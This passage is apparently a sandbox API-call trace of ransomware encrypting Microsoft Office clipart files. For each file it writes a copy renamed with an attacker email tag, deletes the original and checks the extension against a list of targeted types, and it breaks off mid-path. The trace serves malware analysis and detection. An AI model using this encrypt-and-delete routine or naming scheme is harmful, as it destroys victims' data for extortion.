1 [0058.197] WriteFile (in: hFile=0x248, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1050, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x1050, lpOverlapped=0x0) returned 1 [0058.198] ReadFile (in: hFile=0x1b4, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0058.198] WriteFile (in: hFile=0x248, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0058.198] SetEndOfFile (hFile=0x248) returned 1 [0058.198] CloseHandle (hObject=0x248) returned 1 [0058.198] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0058.198] SetEndOfFile (hFile=0x1b4) returned 1 [0058.199] CloseHandle (hObject=0x1b4) returned 1 [0058.199] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0058.199] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00274_.wmf")) returned 1 [0058.442] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 63 [0058.442] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 63 [0058.442] lstrlenW (lpString=".doc") returned 4 [0058.442] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0058.442] lstrlenW (lpString=".docx") returned 5 [0058.442] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0058.442] lstrlenW (lpString=".pdf") returned 4 [0058.442] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0058.442] lstrlenW (lpString=".xls") returned 4 [0058.442] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0058.442] lstrlenW (lpString=".xlsx") returned 5 [0058.442] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0058.442] lstrlenW (lpString=".ppt") returned 4 [0058.442] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0058.442] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 63 [0058.442] lstrlenW (lpString=".zip") returned 4 [0058.442] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0058.442] lstrlenW (lpString=".rar") returned 4 [0058.442] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0058.442] lstrlenW (lpString=".bz2") returned 4 [0058.442] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0058.442] lstrlenW (lpString=".7z") returned 3 [0058.442] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0058.442] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 63 [0058.442] lstrlenW (lpString=".dbf") returned 4 [0058.442] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0058.442] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 63 [0058.442] lstrlenW (lpString=".1cd") returned 4 [0058.442] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0058.443] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 63 [0058.443] lstrlenW (lpString=".jpg") returned 4 [0058.443] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0060.023] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.023] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.023] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\boat.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0060.023] GetLastError () returned 0x0 [0060.023] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0xd16, lpOverlapped=0x0) returned 1 [0060.025] WriteFile (in: hFile=0x1f0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xd20, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xd20, lpOverlapped=0x0) returned 1 [0060.026] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0060.026] WriteFile (in: hFile=0x1f0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xe4, lpOverlapped=0x0) returned 1 [0060.026] SetEndOfFile (hFile=0x1f0) returned 1 [0060.026] CloseHandle (hObject=0x1f0) returned 1 [0060.026] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.026] SetEndOfFile (hFile=0x210) returned 1 [0060.027] CloseHandle (hObject=0x210) returned 1 [0060.027] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0060.027] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\boat.wmf")) returned 1 [0060.027] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF") returned 59 [0060.027] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF") returned 59 [0060.027] lstrlenW (lpString=".doc") returned 4 [0060.027] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0060.027] lstrlenW (lpString=".docx") returned 5 [0060.027] lstrcmpiW (lpString1=".docx", lpString2="T.WMF") returned -1 [0060.027] lstrlenW (lpString=".pdf") returned 4 [0060.027] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0060.028] lstrlenW (lpString=".xls") returned 4 [0060.028] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0060.028] lstrlenW (lpString=".xlsx") returned 5 [0060.028] lstrcmpiW (lpString1=".xlsx", lpString2="T.WMF") returned -1 [0060.028] lstrlenW (lpString=".ppt") returned 4 [0060.028] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0060.028] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF") returned 59 [0060.028] lstrlenW (lpString=".zip") returned 4 [0060.028] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0060.028] lstrlenW (lpString=".rar") returned 4 [0060.028] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0060.028] lstrlenW (lpString=".bz2") returned 4 [0060.028] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0060.028] lstrlenW (lpString=".7z") returned 3 [0060.028] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0060.028] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF") returned 59 [0060.028] lstrlenW (lpString=".dbf") returned 4 [0060.028] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0060.028] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF") returned 59 [0060.028] lstrlenW (lpString=".1cd") returned 4 [0060.028] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0060.028] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF") returned 59 [0060.028] lstrlenW (lpString=".jpg") returned 4 [0060.028] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0060.029] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=1330) returned 1 [0060.029] CloseHandle (hObject=0x210) returned 1 [0060.029] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00076_.wmf")) returned 0x20 [0060.029] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00076_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0060.029] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00076_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0060.029] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.029] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.029] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00076_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0060.029] GetLastError () returned 0x0 [0060.029] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x532, lpOverlapped=0x0) returned 1 [0060.031] WriteFile (in: hFile=0x1f0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x540, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x540, lpOverlapped=0x0) returned 1 [0060.031] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0060.031] WriteFile (in: hFile=0x1f0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0060.031] SetEndOfFile (hFile=0x1f0) returned 1 [0060.032] CloseHandle (hObject=0x1f0) returned 1 [0060.032] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.032] SetEndOfFile (hFile=0x210) returned 1 [0060.032] CloseHandle (hObject=0x210) returned 1 [0060.033] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0060.033] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00076_.wmf")) returned 1 [0060.033] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 63 [0060.033] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 63 [0060.033] lstrlenW (lpString=".doc") returned 4 [0060.033] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0060.033] lstrlenW (lpString=".docx") returned 5 [0060.033] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0060.033] lstrlenW (lpString=".pdf") returned 4 [0060.033] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0060.033] lstrlenW (lpString=".xls") returned 4 [0060.033] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0060.033] lstrlenW (lpString=".xlsx") returned 5 [0060.033] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0060.033] lstrlenW (lpString=".ppt") returned 4 [0060.033] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0060.033] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 63 [0060.033] lstrlenW (lpString=".zip") returned 4 [0060.033] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0060.033] lstrlenW (lpString=".rar") returned 4 [0060.033] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0060.033] lstrlenW (lpString=".bz2") returned 4 [0060.033] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0060.033] lstrlenW (lpString=".7z") returned 3 [0060.033] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0060.034] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 63 [0060.034] lstrlenW (lpString=".dbf") returned 4 [0060.034] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0060.034] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 63 [0060.034] lstrlenW (lpString=".1cd") returned 4 [0060.034] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0060.034] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 63 [0060.034] lstrlenW (lpString=".jpg") returned 4 [0060.034] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0060.034] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=1444) returned 1 [0060.034] CloseHandle (hObject=0x210) returned 1 [0060.035] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00078_.wmf")) returned 0x20 [0060.035] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00078_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0060.035] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00078_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0060.035] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.035] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.035] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00078_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0060.035] GetLastError () returned 0x0 [0060.035] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x5a4, lpOverlapped=0x0) returned 1 [0060.036] WriteFile (in: hFile=0x1f0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x5b0, lpOverlapped=0x0) returned 1 [0060.037] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0060.037] WriteFile (in: hFile=0x1f0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0060.037] SetEndOfFile (hFile=0x1f0) returned 1 [0060.038] CloseHandle (hObject=0x1f0) returned 1 [0060.038] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.038] SetEndOfFile (hFile=0x210) returned 1 [0060.038] CloseHandle (hObject=0x210) returned 1 [0060.038] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0060.039] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00078_.wmf")) returned 1 [0060.039] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 63 [0060.039] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 63 [0060.039] lstrlenW (lpString=".doc") returned 4 [0060.039] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0060.039] lstrlenW (lpString=".docx") returned 5 [0060.039] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0060.039] lstrlenW (lpString=".pdf") returned 4 [0060.039] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0060.039] lstrlenW (lpString=".xls") returned 4 [0060.039] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0060.039] lstrlenW (lpString=".xlsx") returned 5 [0060.039] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0060.039] lstrlenW (lpString=".ppt") returned 4 [0060.039] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0060.039] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 63 [0060.039] lstrlenW (lpString=".zip") returned 4 [0060.039] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0060.039] lstrlenW (lpString=".rar") returned 4 [0060.039] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0060.039] lstrlenW (lpString=".bz2") returned 4 [0060.039] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0060.039] lstrlenW (lpString=".7z") returned 3 [0060.039] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0060.039] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 63 [0060.039] lstrlenW (lpString=".dbf") returned 4 [0060.039] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0060.039] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 63 [0060.039] lstrlenW (lpString=".1cd") returned 4 [0060.039] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0060.039] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 63 [0060.039] lstrlenW (lpString=".jpg") returned 4 [0060.040] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0060.040] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=7974) returned 1 [0060.040] CloseHandle (hObject=0x210) returned 1 [0060.040] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00092_.wmf")) returned 0x20 [0060.040] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00092_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0060.040] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00092_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0060.040] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.040] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.040] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00092_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0060.040] GetLastError () returned 0x0 [0060.041] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x1f26, lpOverlapped=0x0) returned 1 [0060.042] WriteFile (in: hFile=0x1f0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1f30, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x1f30, lpOverlapped=0x0) returned 1 [0060.043] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0060.043] WriteFile (in: hFile=0x1f0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0060.043] SetEndOfFile (hFile=0x1f0) returned 1 [0060.043] CloseHandle (hObject=0x1f0) returned 1 [0060.044] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.044] SetEndOfFile (hFile=0x210) returned 1 [0060.044] CloseHandle (hObject=0x210) returned 1 [0060.044] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0060.045] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00092_.wmf")) returned 1 [0060.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 63 [0060.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 63 [0060.045] lstrlenW (lpString=".doc") returned 4 [0060.045] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0060.045] lstrlenW (lpString=".docx") returned 5 [0060.045] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0060.045] lstrlenW (lpString=".pdf") returned 4 [0060.045] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0060.045] lstrlenW (lpString=".xls") returned 4 [0060.045] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0060.045] lstrlenW (lpString=".xlsx") returned 5 [0060.045] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0060.045] lstrlenW (lpString=".ppt") returned 4 [0060.045] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0060.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 63 [0060.045] lstrlenW (lpString=".zip") returned 4 [0060.045] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0060.045] lstrlenW (lpString=".rar") returned 4 [0060.045] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0060.045] lstrlenW (lpString=".bz2") returned 4 [0060.045] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0060.045] lstrlenW (lpString=".7z") returned 3 [0060.045] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0060.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 63 [0060.045] lstrlenW (lpString=".dbf") returned 4 [0060.045] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0060.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 63 [0060.045] lstrlenW (lpString=".1cd") returned 4 [0060.046] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0060.046] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 63 [0060.046] lstrlenW (lpString=".jpg") returned 4 [0060.046] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0060.046] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=2378) returned 1 [0060.046] CloseHandle (hObject=0x210) returned 1 [0060.046] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft 